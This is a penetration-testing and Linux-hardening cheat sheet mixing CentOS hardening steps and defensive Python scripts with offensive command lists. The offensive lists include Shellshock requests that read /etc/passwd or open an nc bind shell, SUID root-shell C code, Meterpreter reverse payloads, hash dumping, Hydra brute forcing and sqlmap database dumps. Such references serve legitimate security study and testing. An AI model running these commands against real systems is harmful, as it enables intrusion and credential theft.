The “unhide” command used by rkhunter!

On CentOS 7 the unhide command that rkhunter relies on is installed with the following yum command:

yum install unhide unhide-tcp

Without this package rkhunter cannot perform its hidden-process check and skips it, as the following log output shows:

Info: Starting test name ‘malware’
Performing malware checks
Info: Test ‘deleted_files’ disabled at users request.
Info: Starting test name ‘running_procs’
Checking running processes for suspicious files [ None found ]
Info: Starting test name ‘hidden_procs’
Info: Unable to find the ‘unhide’ command
Info: Unable to find the ‘unhide-linux’ command
Checking for hidden processes
[ Skipped ]

rkhunter command-line help:

rkhunter --help

Have Phun!

YUM Commands

Package manager used by RPM-based systems; you can pull some useful information about installed packages and/or install additional tools.

COMMAND DESCRIPTION
yum update Update all RPM packages with YUM; also shows what's out of date.
yum update httpd Update individual packages, in this example HTTPD (Apache).
yum install package Install a package using YUM.
yum --exclude=package kernel* update Exclude a package from being updated with YUM.
yum remove package Remove a package with YUM.
yum erase package Remove a package with YUM.
yum list package Lists info about a yum package.
yum provides httpd Finds which package provides a file or feature, e.g. the Apache HTTPD server.
yum info httpd Shows package info: architecture, version etc.
yum localinstall blah.rpm Use YUM to install a local RPM, resolving dependencies from the repo.
yum deplist package Shows dependencies for a package.
yum list installed | more List all installed packages.
yum grouplist | more Show all YUM groups.
yum groupinstall 'Development Tools' Install a YUM group.

CentOS 7 System Information Commands

Useful for local enumeration.

COMMAND DESCRIPTION
whoami Shows currently logged in user on Linux.
id Shows currently logged in user and the user's groups.
last Shows last logged in users.
mount Show mounted drives.
df -h Shows disk usage in human readable output.
echo "user:passwd" | chpasswd Reset a password in one line.
getent passwd List users on Linux.
strings /usr/local/bin/blah Shows printable strings in non-text files, e.g. what's in a binary.
uname -ar Shows running kernel version.
PATH=$PATH:/my/new-path Add a new PATH entry, handy for local FS manipulation.
history Show bash history, commands the user has entered previously.

Sysctl Security

#nano /etc/sysctl.conf

net.ipv4.ip_forward = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0
net.ipv4.tcp_max_syn_backlog = 1280
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.secure_redirects = 0
net.ipv4.conf.all.log_martians = 1
net.ipv4.conf.default.accept_source_route = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.default.secure_redirects = 0
net.ipv4.icmp_ignore_bogus_error_responses = 1
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
net.ipv4.tcp_timestamps = 0
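Writing the file is only half the job: a key can be overridden by a later file in /etc/sysctl.d, or never applied at all, so the running kernel should be audited against the baseline. The following Python script is an added example, not part of the original page: parse_sysctl() reads sysctl.conf syntax, read_running() pulls the live value of a key from /proc/sys, and audit() lists every key whose live value differs from the baseline. BASELINE is the fragment above; the "running" values used in the self-test are constructed.

```python
"""Audit running sysctl values against the hardening baseline above.

Added example, not part of the original page. parse_sysctl() reads sysctl.conf
syntax, read_running() pulls the live value of a key from /proc/sys, and
audit() lists every key whose live value differs from the baseline, which
is the check to run before and after applying the file. BASELINE is the
fragment from the page; the "running" values in the self-test are constructed.
"""
from pathlib import Path

BASELINE = """\
net.ipv4.ip_forward = 0
net.ipv4.conf.all.send_redirects = 0
net.ipv4.conf.default.send_redirects = 0
net.ipv4.tcp_max_syn_backlog = 1280
net.ipv4.icmp_echo_ignore_broadcasts = 1
net.ipv4.conf.all.accept_source_route = 0
net.ipv4.conf.all.accept_redirects = 0
net.ipv4.conf.all.secure_redirects = 0
net.ipv4.conf.all.log_martians = 1
net.ipv4.conf.default.accept_source_route = 0
net.ipv4.conf.default.accept_redirects = 0
net.ipv4.conf.default.secure_redirects = 0
net.ipv4.icmp_ignore_bogus_error_responses = 1
net.ipv4.tcp_syncookies = 1
net.ipv4.conf.all.rp_filter = 1
net.ipv4.conf.default.rp_filter = 1
net.ipv4.tcp_timestamps = 0
"""


def parse_sysctl(text):
    """Parse 'key = value' lines; '#' and ';' start comments. A repeated key keeps
    its last value, which is also what sysctl -p does."""
    settings = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].split(";", 1)[0].strip()
        if not line:
            continue
        key, sep, value = line.partition("=")
        if sep:
            settings[key.strip()] = value.strip()
    return settings


def read_running(key, root="/proc/sys"):
    """Live value of one key: dots in the key name map to directories under /proc/sys."""
    return (Path(root) / key.replace(".", "/")).read_text().strip()


def collect_running(keys, root="/proc/sys"):
    """Read every key that exists under root; unreadable keys are left out."""
    running = {}
    for key in keys:
        try:
            running[key] = read_running(key, root)
        except OSError:
            pass
    return running


def audit(baseline, running):
    """Return [(key, expected, actual)] for keys that differ; actual is None when
    the key could not be read (module not loaded, IPv4 disabled, etc.)."""
    drift = []
    for key, expected in baseline.items():
        actual = running.get(key)
        if actual is None or actual.split() != expected.split():
            drift.append((key, expected, actual))
    return drift


if __name__ == "__main__":
    baseline = parse_sysctl(BASELINE)
    for key, expected, actual in audit(baseline, collect_running(baseline)):
        print(f"DRIFT {key}: want {expected!r}, running {actual!r}")
```

Run it as root (or any user, since /proc/sys is world-readable) after `sysctl -p`; an empty report means the kernel matches the file. Values are compared as whitespace-split tokens so multi-value keys still compare correctly.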

Notes

BOF / Exploit

Exploit Research

Find exploits for enumerated hosts / services.

COMMAND DESCRIPTION
searchsploit windows 2003 | grep -i local Search exploit-db for exploits, in this example Windows 2003 + local escalation
site:exploit-db.com exploit kernel <= 3 Use Google to search exploit-db.com for exploits
grep -R "W7" /usr/share/metasploit-framework/modules/exploit/windows/* Search Metasploit modules using grep; msf search sucks a bit

Searching for Exploits

Update the local copy of exploit-db, then search it:

 searchsploit -u
 searchsploit apache 2.2
 searchsploit "Linux Kernel"
 searchsploit linux 2.6 | grep -i ubuntu | grep local

Compiling Windows Exploits on Kali

  wget -O mingw-get-setup.exe http://sourceforge.net/projects/mingw/files/Installer/mingw-get-setup.exe/download
  wine mingw-get-setup.exe
  select mingw32-base
  cd /root/.wine/drive_c/windows
  wget http://gojhonny.com/misc/mingw_bin.zip && unzip mingw_bin.zip
  cd /root/.wine/drive_c/MinGW/bin
  wine gcc -o ability.exe /tmp/exploit.c -lwsock32
  wine ability.exe  

Cross Compiling Exploits

gcc -m32 -o output32 hello.c (32 bit)
gcc -m64 -o output hello.c (64 bit)

Exploiting Common Vulnerabilities

Exploiting Shellshock

A tool to find and exploit servers vulnerable to Shellshock:

git clone https://github.com/nccgroup/shocker
./shocker.py -H TARGET --command "/bin/cat /etc/passwd" -c /cgi-bin/status --verbose
cat FILE (view file contents)
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; echo \$(</etc/passwd)\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shellshock bind shell:
echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc TARGET 80
Shellshock reverse shell (listener side):
nc -l -p 443
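All three requests above carry the same tell-tale prefix in a request header, and that prefix is what a defender looks for in web server or proxy logs. The following Python code is an added example, not part of the original page or the shocker project: it parses a raw HTTP request head, flags any header value that starts a bash function definition, and applies the same pattern to combined-format access log lines. The request and log samples are constructed for the self-test.

```python
"""Spot Shellshock probes in HTTP requests and access logs.

Added example, not part of the original page. Every Shellshock payload has
to start with bash's function-export prefix "() {" inside an environment
variable, and CGI puts request headers into environment variables, so that
prefix in any header value (User-Agent, Referer, Cookie, ...) is the thing
to alert on; the command that follows it varies. The raw requests and log
lines below are constructed samples for the self-test.
"""
import re

# "()" followed by optional whitespace and "{": the bash function-definition marker
SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")


def parse_request(raw):
    """Split a CRLF-delimited HTTP/1.x request head into (request_line, {header: value})."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return lines[0], headers


def find_shellshock_headers(raw):
    """Return [(header_name, value)] for every header in the request that carries the marker."""
    _, headers = parse_request(raw)
    return [(n, v) for n, v in headers.items() if SHELLSHOCK_RE.search(v)]


def scan_access_log(lines):
    """Return the access-log lines (combined format, which records the User-Agent) that carry the marker."""
    return [line for line in lines if SHELLSHOCK_RE.search(line)]


# Constructed samples: one probe shaped like the page's HEAD request, one ordinary request.
PROBE = ("HEAD /cgi-bin/status HTTP/1.1\r\n"
         "User-Agent: () { :;}; /bin/echo probe\r\n"
         "Host: vulnerable\r\nConnection: close\r\n\r\n")
BENIGN = ("GET /cgi-bin/status HTTP/1.1\r\n"
          "User-Agent: Mozilla/5.0 (X11; Linux x86_64) Gecko\r\n"
          "Host: vulnerable\r\n\r\n")
ACCESS_LOG = [
    '203.0.113.5 - - [25/Sep/2014:10:00:01 +0000] "HEAD /cgi-bin/status HTTP/1.1" 200 - "-" "() { :;}; /bin/echo probe"',
    '198.51.100.7 - - [25/Sep/2014:10:00:02 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0 (X11; Linux x86_64) Gecko"',
]

if __name__ == "__main__":
    print(find_shellshock_headers(PROBE))
    print(find_shellshock_headers(BENIGN))
    for hit in scan_access_log(ACCESS_LOG):
        print("ALERT", hit)
```

The regex deliberately ignores everything after the prefix: matching on the command (`cat /etc/passwd`, `nc -l`) would miss the next variant, while the function-definition marker is the part the vulnerable bash parser needs. A HEAD request with no User-Agent recorded in the log will not be caught, which is why the common log format (no User-Agent field) is a poor fit for this check.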

Simple Local Web Servers

Python local web server command, handy for serving up shells and exploits on an attacking machine.

COMMAND DESCRIPTION
python -m SimpleHTTPServer 80 Run a basic http server, great for serving up shells etc
python3 -m http.server Run a basic Python3 http server, great for serving up shells etc
ruby -rwebrick -e "WEBrick::HTTPServer.new(:Port => 80, :DocumentRoot => Dir.pwd).start" Run a basic Ruby WEBrick http server
php -S 0.0.0.0:80 Run a basic PHP http server

Mounting File Shares

How to mount NFS / CIFS, Windows and Linux file shares.

COMMAND DESCRIPTION
mount 192.168.1.1:/vol/share /mnt/nfs Mount NFS share to /mnt/nfs
mount -t cifs -o username=user,password=pass,domain=blah //192.168.1.X/share-name /mnt/cifs Mount a Windows CIFS / SMB share on Linux at /mnt/cifs; if you omit password it will prompt on the CLI (more secure as it won't end up in bash_history)
net use Z: \\win-server\share password /user:domain\janedoe /savecred /p:no Mount a Windows share on Windows from the command line
apt-get install smb4k -y Install smb4k on Kali, useful Linux GUI for browsing SMB shares

HTTP / HTTPS Webserver Enumeration

COMMAND DESCRIPTION
nikto -h 192.168.1.1 Perform a nikto scan against target
dirbuster Configure via GUI, CLI input doesn’t work most of the time

Packet Inspection

COMMAND DESCRIPTION
tcpdump tcp port 80 -w output.pcap -i eth0 tcpdump for port 80 on interface eth0, outputs to output.pcap

Username Enumeration

Some techniques used to remotely enumerate users on a target system.

SMB User Enumeration

COMMAND DESCRIPTION
python /usr/share/doc/python-impacket-doc/examples/samrdump.py 192.168.XXX.XXX Enumerate users from SMB
ridenum.py 192.168.XXX.XXX 500 50000 dict.txt RID cycle SMB / enumerate users from SMB

SNMP User Enumeration

COMMAND DESCRIPTION
snmpwalk -v1 -c public 192.168.X.XXX 1 | grep 77.1.2.25 | cut -d" " -f4 Enumerate users from SNMP
python /usr/share/doc/python-impacket-doc/examples/samrdump.py SNMP 192.168.X.XXX Enumerate users from SNMP
nmap -sT -p 161 192.168.X.0/24 -oG snmp_results.txt (then grep) Search for SNMP servers with nmap, grepable output

Passwords

Wordlists

COMMAND DESCRIPTION
/usr/share/wordlists Kali word lists

Brute Forcing Services

Hydra FTP Brute Force

COMMAND DESCRIPTION
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX ftp -V Hydra FTP brute force

Hydra POP3 Brute Force

COMMAND DESCRIPTION
hydra -l USERNAME -P /usr/share/wordlists/nmap.lst -f 192.168.X.XXX pop3 -V Hydra POP3 brute force

Hydra SMTP Brute Force

COMMAND DESCRIPTION
hydra -P /usr/share/wordlists/nmap.lst 192.168.X.XXX smtp -V Hydra SMTP brute force

Use -t to limit concurrent connections, example: -t 15

Password Cracking

John The Ripper – JTR

COMMAND DESCRIPTION
john --wordlist=/usr/share/wordlists/rockyou.txt hashes JTR password cracking
john --format=descrypt --wordlist=/usr/share/wordlists/rockyou.txt hash.txt JTR forced descrypt cracking with wordlist
john --format=descrypt hash --show JTR forced descrypt brute force cracking

Windows Penetration Testing Commands

See Windows Penetration Testing Commands.

Linux Penetration Testing Commands

See Linux Commands Cheat Sheet for a list of Linux penetration testing commands, useful for local system enumeration.

Compiling Exploits

Some notes on compiling exploits.

Identifying if C code is for Windows or Linux

C #includes will indicate which OS should be used to build the exploit.

COMMAND DESCRIPTION
process.h, string.h, winbase.h, windows.h, winsock2.h Windows exploit code
arpa/inet.h, fcntl.h, netdb.h, netinet/in.h, sys/socket.h, sys/types.h, unistd.h Linux exploit code

Build Exploit GCC

Compile an exploit with gcc.

COMMAND DESCRIPTION
gcc -o exploit exploit.c Basic GCC compile

GCC Compile 32Bit Exploit on 64Bit Kali

Handy for cross compiling 32 bit binaries on 64 bit attacking machines.

COMMAND DESCRIPTION
gcc -m32 exploit.c -o exploit Cross compile 32 bit binary on 64 bit Linux

Compile Windows .exe on Linux

Build / compile windows exploits on Linux, resulting in a .exe file.

COMMAND DESCRIPTION
i586-mingw32msvc-gcc exploit.c -lws2_32 -o exploit.exe Compile windows .exe on Linux

SUID Binary

SUID C binaries are often used to spawn a shell as the superuser; update the UID / GID and the shell as required.

Below are some quick copy-and-paste examples for various shells:

SUID C Shell for /bin/bash

#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    /* set real, effective and saved UID to root before spawning the shell */
    setresuid(0, 0, 0);
    system("/bin/bash");
    return 0;
}

SUID C Shell for /bin/sh

#define _GNU_SOURCE
#include <stdlib.h>
#include <unistd.h>

int main(void) {
    setresuid(0, 0, 0);
    system("/bin/sh");
    return 0;
}

Building the SUID Shell binary

gcc -o suid suid.c  

For 32 bit:

gcc -m32 -o suid suid.c  

Reverse Shells

See Reverse Shell Cheat Sheet for a list of useful Reverse Shells.

TTY Shells

Tips / Tricks to spawn a TTY shell from a limited shell in Linux, useful for running commands like su from reverse shells.

Python TTY Shell Trick

python -c 'import pty;pty.spawn("/bin/bash")'
python -c 'import os;os.system("/bin/bash")'

Spawn Interactive sh shell

/bin/sh -i

Spawn Perl TTY Shell

exec "/bin/sh";
perl -e 'exec "/bin/sh";'

Spawn Ruby TTY Shell

exec "/bin/sh"

Spawn Lua TTY Shell

os.execute('/bin/sh')

Spawn TTY Shell from Vi

Run shell commands from vi:

:!bash

Spawn TTY Shell NMAP

!sh

Metasploit

Some basic Metasploit commands that I have found handy for reference; for pivoting see Meterpreter Pivoting techniques.

Meterpreter Payloads

Windows reverse meterpreter payload

COMMAND DESCRIPTION
set payload windows/meterpreter/reverse_tcp Windows reverse tcp payload

Windows VNC Meterpreter payload

COMMAND DESCRIPTION
set payload windows/vncinject/reverse_tcp Meterpreter Windows VNC payload
set ViewOnly false (then disable view-only mode)

Linux Reverse Meterpreter payload

COMMAND DESCRIPTION
set payload linux/meterpreter/reverse_tcp Meterpreter Linux Reverse Payload

Meterpreter Cheat Sheet

Useful meterpreter commands.

COMMAND DESCRIPTION
upload file c:\\windows Meterpreter upload file to Windows target
download c:\\windows\\repair\\sam /tmp Meterpreter download file from Windows target
execute -f c:\\windows\\temp\\exploit.exe Meterpreter run .exe on target, handy for executing uploaded exploits
execute -f cmd -c Creates new channel with cmd shell
ps Meterpreter show processes
shell Meterpreter get shell on the target
getsystem Meterpreter attempts privilege escalation on the target
hashdump Meterpreter attempts to dump the hashes on the target
portfwd add -l 3389 -p 3389 -r target Meterpreter create port forward to target machine
portfwd delete -l 3389 -p 3389 -r target Meterpreter delete port forward

Common Metasploit Modules

Top metasploit modules.

Remote Windows Metasploit Modules (exploits)

COMMAND DESCRIPTION
use exploit/windows/smb/ms08_067_netapi MS08_067 Windows 2k, XP, 2003 Remote Exploit
use exploit/windows/dcerpc/ms06_040_netapi MS06_040 Windows NT, 2k, XP, 2003 Remote Exploit
use exploit/windows/smb/ms09_050_smb2_negotiate_func_index MS09_050 Windows Vista SP1/SP2 and Server 2008 (x86) Remote Exploit

Local Windows Metasploit Modules (exploits)

COMMAND DESCRIPTION
use exploit/windows/local/bypassuac Bypass UAC on Windows 7 + Set target + arch, x86/64

Auxiliary Metasploit Modules

COMMAND DESCRIPTION
use auxiliary/scanner/http/dir_scanner Metasploit HTTP directory scanner
use auxiliary/scanner/http/jboss_vulnscan Metasploit JBOSS vulnerability scanner
use auxiliary/scanner/mssql/mssql_login Metasploit MSSQL Credential Scanner
use auxiliary/scanner/mysql/mysql_version Metasploit MySQL Version Scanner
use auxiliary/scanner/oracle/oracle_login Metasploit Oracle Login Module

Metasploit Powershell Modules

COMMAND DESCRIPTION
use exploit/multi/script/web_delivery Metasploit powershell payload delivery module
post/windows/manage/powershell/exec_powershell Metasploit upload and run powershell script through a session
use exploit/multi/http/jboss_maindeployer Metasploit JBOSS deploy
use exploit/windows/mssql/mssql_payload Metasploit MSSQL payload

Post Exploit Windows Metasploit Modules

Windows Metasploit Modules for privilege escalation.

COMMAND DESCRIPTION
run post/windows/gather/win_privs Metasploit show privileges of current user
use post/windows/gather/credentials/gpp Metasploit grab GPP saved passwords
load mimikatz -> wdigest Metasploit load Mimikatz
run post/windows/gather/local_admin_search_enum Identify other machines that the supplied domain user has administrative access to
run post/windows/gather/smart_hashdump Automated dumping of sam file, tries to esc privileges etc

ASCII Table Cheat Sheet

Useful for Web Application Penetration Testing, or if you get stranded on Mars and need to communicate with NASA.

ASCII CHARACTER
x00 Null Byte
x08 BS
x09 TAB
x0a LF
x0d CR
x1b ESC
x20 SPC
x21 !
x22 "
x23 #
x24 $
x25 %
x26 &
x27 '
x28 (
x29 )
x2a *
x2b +
x2c ,
x2d -
x2e .
x2f /
x30 0
x31 1
x32 2
x33 3
x34 4
x35 5
x36 6
x37 7
x38 8
x39 9
x3a :
x3b ;
x3c <
x3d =
x3e >
x3f ?
x40 @
x41 A
x42 B
x43 C
x44 D
x45 E
x46 F
x47 G
x48 H
x49 I
x4a J
x4b K
x4c L
x4d M
x4e N
x4f O
x50 P
x51 Q
x52 R
x53 S
x54 T
x55 U
x56 V
x57 W
x58 X
x59 Y
x5a Z
x5b [
x5c \
x5d ]
x5e ^
x5f _
x60 `
x61 a
x62 b
x63 c
x64 d
x65 e
x66 f
x67 g
x68 h
x69 i
x6a j
x6b k
x6c l
x6d m
x6e n
x6f o
x70 p
x71 q
x72 r
x73 s
x74 t
x75 u
x76 v
x77 w
x78 x
x79 y
x7a z

CISCO IOS Commands

A collection of useful Cisco IOS commands.

COMMAND DESCRIPTION
enable Enters enable mode
conf t Short for configure terminal
(config)# interface fa0/0 Configure FastEthernet 0/0
(config-if)# ip addr 0.0.0.0 255.255.255.255 Add IP to fa0/0
(config-if)# line vty 0 4 Configure vty line
(config-line)# login Cisco set telnet password
(config-line)# password YOUR-PASSWORD Set telnet password
# show running-config Show running config loaded in memory
# show startup-config Show startup config
# show version Show Cisco IOS version
# show session Display open sessions
# show ip interface Show network interfaces
# show interface e0 Show detailed interface info
# show ip route Show routes
# show access-lists Show access lists
# dir file systems Show available file systems
# dir all-filesystems File information
# dir /all Show deleted files
# terminal length 0 No limit on terminal output
# copy running-config tftp Copies running config to a TFTP server
# copy running-config startup-config Save running-config to startup-config

Cryptography

Hash Lengths

HASH SIZE
MD5 Hash Length 16 Bytes
SHA-1 Hash Length 20 Bytes
SHA-256 Hash Length 32 Bytes
SHA-512 Hash Length 64 Bytes

Hash Examples

Likely you will just use hash-identifier for this, but here are some example hashes:

HASH EXAMPLE
MD5 Hash Example 8743b52063cd84097a65d1633f5c74f5
MD5 $PASS:$SALT Example 01dfae6e5d4d90d9892622325959afbe:7050461
MD5 $SALT:$PASS f0fda58630310a6dd91a7d8f0a4ceda2:4225637426
SHA1 Hash Example b89eaac7e61417341b710b727768294d0e6a277b
SHA1 $PASS:$SALT 2fc5a684737ce1bf7b3b239df432416e0dd07357:2014
SHA1 $SALT:$PASS cac35ec206d868b7d7cb0b55f31d9425b075082b:5363620024
SHA-256 127e6fbfe24a750e72930c220a8e138275656b8e5d8f48a98c3c92df2caba935
SHA-256 $PASS:$SALT c73d08de890479518ed60cf670d17faa26a4a71f995c1dcc978165399401a6c4
SHA-256 $SALT:$PASS eb368a2dfd38b405f014118c7d9747fcc97f4f0ee75c05963cd9da6ee65ef498:560407001617
SHA-512 82a9dda829eb7f8ffe9fbe49e45d47d2dad9664fbb7adf72492e3c81ebd3e29134d9bc12212bf83c6840f10e8246b9db54a4859b7ccd0123d86e5872c1e5082f
SHA-512 $PASS:$SALT e5c3ede3e49fb86592fb03f471c35ba13e8d89b8ab65142c9a8fdafb635fa2223c24e5558fd9313e8995019dcbec1fb584146b7bb12685c7765fc8c0d51379fd
SHA-512 $SALT:$PASS 976b451818634a1e2acba682da3fd6efa72adf8a7a08d7939550c244b237c72c7d42367544e826c0c83fe5c02f97c0373b6b1386cc794bf0d21d2df01bb9c08a
NTLM Hash Example b4b9b02e6f09a9bd760f388b67351e2b
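The two tables above are enough to write the identification by hand, and to confirm a guess rather than eyeball it. The following Python is an added example, not part of the original page or the hash-identifier tool: identify() applies the digest-length table to a hex hash (with the optional ":salt" suffix the examples use), check_candidate() recomputes the digest for a candidate password in either salt order, and digest_lengths() recomputes the Hash Lengths table with hashlib. The example hashes in the table are hashcat's published example hashes, whose plaintext is the word "hashcat"; the usage at the bottom relies on that.

```python
"""Identify hash families by digest length and verify candidate plaintexts.

Added example, not part of the original cheat sheet. identify() applies the
length table above to a hex hash (with the optional ":salt" suffix used in
the examples), and check_candidate() recomputes the digest for a guessed
password so a table entry can be confirmed rather than eyeballed. The
example hashes in the table are hashcat's published example hashes, whose
plaintext is the word "hashcat"; the usage at the bottom relies on that.
"""
import hashlib
import re

# digest size in bytes -> hash family (MD5 and NTLM share a 16-byte digest)
HASH_LENGTHS = {16: "MD5 or NTLM", 20: "SHA-1", 32: "SHA-256", 64: "SHA-512"}
HEX_RE = re.compile(r"^[0-9a-fA-F]+$")
ALGORITHMS = {"MD5": "md5", "SHA-1": "sha1", "SHA-256": "sha256", "SHA-512": "sha512"}


def digest_lengths():
    """Recompute the Hash Lengths table with hashlib instead of trusting it."""
    return {name: hashlib.new(alg).digest_size for name, alg in ALGORITHMS.items()}


def identify(entry):
    """Return (family, salt) for a 'hexhash' or 'hexhash:salt' string.
    family is None when the hex part is malformed or has no known length."""
    hex_part, sep, salt = entry.strip().partition(":")
    if not HEX_RE.match(hex_part) or len(hex_part) % 2:
        return None, None
    return HASH_LENGTHS.get(len(hex_part) // 2), (salt if sep else None)


def check_candidate(entry, password, family, order="pass:salt"):
    """True if hashing password (with the entry's salt, in the given order) reproduces the hash.
    order is 'pass:salt' for the $PASS:$SALT rows and 'salt:pass' for the $SALT:$PASS rows;
    an entry without a salt works with either order. family is a key of ALGORITHMS."""
    hex_part, _, salt = entry.strip().partition(":")
    data = (password + salt) if order == "pass:salt" else (salt + password)
    digest = hashlib.new(ALGORITHMS[family], data.encode()).hexdigest()
    return digest == hex_part.lower()


if __name__ == "__main__":
    print(digest_lengths())
    for entry in ["8743b52063cd84097a65d1633f5c74f5",
                  "2fc5a684737ce1bf7b3b239df432416e0dd07357:2014",
                  "b4b9b02e6f09a9bd760f388b67351e2b"]:
        print(entry, identify(entry))
    # hashcat's example hashes use the plaintext "hashcat"
    print(check_candidate("01dfae6e5d4d90d9892622325959afbe:7050461", "hashcat", "MD5"))
```

Length alone cannot separate MD5 from NTLM (both 16 bytes), which is why identify() reports both; NTLM is MD4 over the UTF-16LE password, so check_candidate() with the "MD5" family will correctly fail on the NTLM example.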

SQLMap Examples

COMMAND DESCRIPTION
sqlmap -u http://meh.com --forms --batch --crawl=10 --cookie=jsessionid=54321 --level=5 --risk=3 Automated sqlmap scan
sqlmap -u TARGET -p PARAM --data=POSTDATA --cookie=COOKIE --level=3 --current-user --current-db --passwords --file-read="/var/www/blah.php" Targeted sqlmap scan
sqlmap -u "http://meh.com/meh.php?id=1" --dbms=mysql --tech=U --random-agent --dump Scan URL for union + error based injection with MySQL backend, use a random user agent and dump the database
sqlmap -o -u "http://meh.com/form/" --forms sqlmap check form for injection
sqlmap -o -u "http://meh/vuln-form" --forms -D database-name -T users --dump sqlmap dump and crack hashes for table users on database-name

Notes

Disable core dumps for all users

#nano /etc/security/limits.conf

* hard core 0

Disable core dumps for SUID programs

sysctl -w fs.suid_dumpable=0

and add the following line to /etc/sysctl.conf:

fs.suid_dumpable = 0

Set fs.suid_dumpable at runtime without printing the result:

sysctl -q -n -w fs.suid_dumpable=0

If fs.suid_dumpable is present in /etc/sysctl.conf, change its value to "0"; otherwise append "fs.suid_dumpable = 0" to /etc/sysctl.conf:

if grep --silent '^fs.suid_dumpable' /etc/sysctl.conf; then
    sed -i 's/^fs.suid_dumpable.*/fs.suid_dumpable = 0/g' /etc/sysctl.conf
else
    echo "" >> /etc/sysctl.conf
    echo "# Set fs.suid_dumpable to 0 per security requirements" >> /etc/sysctl.conf
    echo "fs.suid_dumpable = 0" >> /etc/sysctl.conf
fi

Buffer Overflow Protection

This section helps mitigate against Buffer Overflow attacks (BOF).

Enable ExecShield

Helps prevent stack smashing / BOF.

Enable on current kernel: sysctl -w kernel.exec-shield=1

Add to /etc/sysctl.conf:

kernel.exec-shield = 1

Check / Enable ASLR

Set kernel.randomize_va_space at runtime: sysctl -q -n -w kernel.randomize_va_space=2

Add kernel.randomize_va_space = 2 to /etc/sysctl.conf if it does not already exist.

Enable XD or NX Support on x86 Systems

Recent processors in the x86 family support the ability to prevent code execution on a per memory page basis. Generically and on AMD processors, this ability is called No Execute (NX), while on Intel processors it is called Execute Disable (XD). This ability can help prevent exploitation of buffer overflow vulnerabilities and should be activated whenever possible. Extra steps must be taken to ensure that this protection is enabled, particularly on 32-bit x86 systems. Other processors, such as Itanium and POWER, have included such support since inception and the standard kernel for those platforms supports the feature.

Check the BIOS and ensure XD/NX is enabled; not relevant for VMs.

Disable SSH Support for .rhosts Files

SSH can emulate the behavior of the obsolete rsh command in allowing users to enable insecure access to their accounts via .rhosts files.

To ensure this behavior is disabled, add or correct the following line in /etc/ssh/sshd_config:

IgnoreRhosts yes

Let’s Encrypt!

We’re making it possible for everyone to experience a secure and privacy-respecting Web. We make it easy to get certificates for HTTPS, because ease of use is critical for adoption. We provide certificates free of charge, because cost excludes people. Our certificates are available in every country in the world, because the secure Web is for everyone. We strive to be open and transparent, because these values are essential for trust.

https://letsencrypt.org/donate/

Quality open source alternative to SonicWALL and WatchGuard

Untangle’s Firewall filters traffic based on IP address, protocol and ports and allows administrators to designate which systems and services (http, ftp, etc.) are publicly available, create a DMZ and perform NAT (with Router), and run as a transparent bridge to complement existing hardware.

Untangle is much more than a firewall. It is, in fact, a Linux distribution that includes a host of software written by other developers. Software includes a Web Filter, Spam Blocker, Spyware Blocker, Virus Blocker, Phish Blocker, Intrusion Prevention, Attack Blocker, OpenVPN, Router, Untangle Reports, and Untangle Platform.

Features include:

  • Blocks sessions based on simple rules
  • Rules can be based on a variety of attributes
  • Custom logging, blocking or passing rules can be created by:
    • protocol
    • direction
    • source address
    • destination address
    • source port
    • destination port

Source : https://www.untangle.com/

Install Bro on CentOS 7.X/6.X

Required Dependencies

Bro requires the following dependencies to work properly:

  • Libpcap   (Package name=libpcap-devel)
  • OpenSSL libraries (openssl-devel)
  • BIND8 library (already installed in CentOS)
  • Libz (already installed in CentOS)
  • Bash (for BroControl)
  • Python (for BroControl) (python-devel)

To build Bro from source, the build tools in the following yum command are also required.

Let us install all of the above dependencies first:

sudo yum install cmake make gcc gcc-c++ flex bison libpcap-devel openssl-devel python-devel swig zlib-devel perl

Optional Dependencies

The following are optional dependencies; Bro can make use of them if they are available at build time:

  • LibGeoIP (for geolocating IP addresses)
  • sendmail (enables Bro and BroControl to send mail)
  • gawk (enables all features of bro-cut)
  • curl (used by a Bro script that implements active HTTP)
  • gperftools (tcmalloc is used to improve memory and CPU usage)
  • ipsumdump (for trace-summary; http://www.cs.ucla.edu/~kohler/ipsumdump)
  • Ruby executable, library, and headers (for Broccoli Ruby bindings)

LibgeoIP

During the process of creating policy scripts the need may arise to find the geographic location for an IP address. Bro has support for the GeoIP library at the policy script level beginning with release 1.3 to account for this need. To use this functionality, you need to first install the libGeoIP software, and then install the GeoLite city database before building Bro.

Libgeoip allows bro to

sudo yum install GeoIP-devel

A country database for GeoIPLite is included when you do the C API install, but for Bro, we are using the city database which includes cities and regions in addition to countries.

Download the GeoLite city binary database.

wget http://geolite.maxmind.com/download/geoip/database/GeoLiteCity.dat.gz
#unzip the database
gunzip GeoLiteCity.dat.gz

Move the database to the directory Bro expects:

 sudo mv GeoLiteCity.dat /usr/share/GeoIP/GeoIPCity.dat

Install gawk

GNU implementation of the famous awk utility:

sudo yum install gawk

Install gperftools(google performance tools)

Gperftools is a collection of a high-performance multi-threaded malloc() implementation, plus some pretty nifty performance analysis tools

sudo yum install gperftools

Ipsumdump

The ipsumdump program reads IP packets from one or more data sources, then summarizes those packets into a line-based ASCII file. The resulting summary dump is easy to process with text-based tools

#Download the latest version from here 
wget http://www.read.seas.harvard.edu/~kohler/ipsumdump/ipsumdump-1.85.tar.gz
tar -xvf ipsumdump-1.85.tar.gz
cd ipsumdump-1.85
./configure --prefix=/usr/
make 
sudo make install

Install Bro

Download the latest version from here

